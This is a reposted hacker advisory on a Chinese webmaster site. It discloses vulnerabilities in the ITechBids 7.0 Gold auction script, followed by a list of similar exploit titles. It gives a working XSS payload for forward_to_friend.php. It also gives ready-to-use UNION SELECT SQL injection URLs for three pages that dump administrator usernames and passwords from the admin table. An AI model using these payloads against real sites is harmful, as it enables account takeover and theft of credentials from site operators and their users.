首页 网页制作网络编程脚本专栏数据库网站运营网络安全平面设计CMS教程

ITechBids 7.0 Gold (XSS/SQL) Multiple Remote Vulnerabilities

所属分类: 网络安全 / Exploit 阅读数: 106
收藏 0 赞 0 分享
######## ## ## ###### ######## ## ## ######## ######## ####### ########
## ### ## ## ## ## ## ## ## ## ## ## ## ## ## ##
## #### ## ## ## ## #### ## ## ## ## ## ##
###### ## ## ## ## ######## ## ######## ## ####### ## ##
## ## #### ## ## ## ## ## ## ## ## ##
## ## ### ## ## ## ## ## ## ## ## ## ## ##
######## ## ## ###### ## ## ## ## ## ####### ########

################################ !R4Q!4N H4CK3R ###################################

ITechBids 7.0 Gold Multiple Remote Vulnerabilities

Website : http://www.itechscripts.com

Founded By : Encrypt3d.M!nd

NOTE:I Didn't Search The Script Well,So Maybe There is other Vulnerabilities.


# 1- Cross-site scripting (XSS):

Affected File : forward_to_friend.php

PoC :

/forward_to_friend.php?productid=<script>alert(666);</script>


# 2-Remote Sql Injection(s) :

Affected File(s) :

sellers_othersitem.php
classifieds.php
shop.php

Note:There is Other Files Affected But I Couldn't Exploit Them :(

PoC:

/sellers_othersitem.php?seller_id=666666 union select 1,2,3,concat(user_name,0x3a,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39 from admin

/classifieds.php?productid=666666 union select 1,2,3,concat(user_name,0x3a,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39 from admin

/shop.php?id=666666 union select 1,2,3,concat(user_name,0x3a,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39 from admin


# Greetz:

MY Sweet,L!0N,EL Mariachi,-=MizO=-(:-L),Shadow Administrator,
KoRn The Dog,Mini-Spider,All My Friends


The EnD :D
更多精彩内容其他人还在看

Pragyan CMS 2.6.2 (sourceFolder) Remote File Inclusion Vulnerability

<< In The Name Of GOD >> -------------------------------------------------------------
收藏 0 赞 0 分享

Galatolo Web Manager 1.3a

--== ============================================================================ ==-- --== Galatolo Web Manager 1.3a <= XSS / Remo
收藏 0 赞 0 分享

pSys 0.7.0 Alpha Multiple Remote File Inclusion Vulnerability

==================================================== | pSys v0.7.0 Alpha Multiple Remote File Include | (works only with
收藏 0 赞 0 分享

Bilboblog 2.1 Multiple Remote Vulnerabilities

------------------------------------------------------------------ Name : Bilboblog 2.1 Multiples Vulnerabilities Descrip
收藏 0 赞 0 分享

Pluck 4.5.1 (blogpost) Local File Inclusion Vulnerability (win only)

########################## www.BugReport.ir ######################### # # AmnPardaz Security Research Team # # Title: Pluck
收藏 0 赞 0 分享

Scripteen Free Image Hosting Script 1.2 (cookie) Pass Grabber Exploit

<?php /* Coded By RMx - Liz0zim BiyoSecurity.Com & Coderx.org Ki zava Ki Zava :) Thanx : Crackers_Child - TR_IP - Volq
收藏 0 赞 0 分享

CodeDB (list.php lang) Local File Inclusion Vulnerability

############################################################################### # # Name : CodeDB (list.php lang) Local File In
收藏 0 赞 0 分享

MFORUM 0.1a Arbitrary Add-Admin Vulnerability

================================================= MFORUM 0.1a Arbitrary Add-Admin Vulnerability ====================================
收藏 0 赞 0 分享

ITechBids 7.0 Gold (XSS/SQL) Multiple Remote Vulnerabilities

######## ## ## ###### ######## ## ## ######## ######## ####### ######## ## ### ## ## ## ## ## ## ## ##
收藏 0 赞 0 分享

MS Windows (.doc File) Malformed Pointers Denial of Service Exploit

/***************************************************************************** * Microsoft Windows .doc File Malformed Pointer
收藏 0 赞 0 分享
查看更多

网络赚钱

更多

站长故事

更多
建站极客
合作伙伴
在线工具
建站极客移动版
聚合全网技术文章,根据你的阅读喜好进行个性推荐
© 2012 - 2020 zhanzhang360.cn Some Rights Reserved.
沪ICP备13040166号-22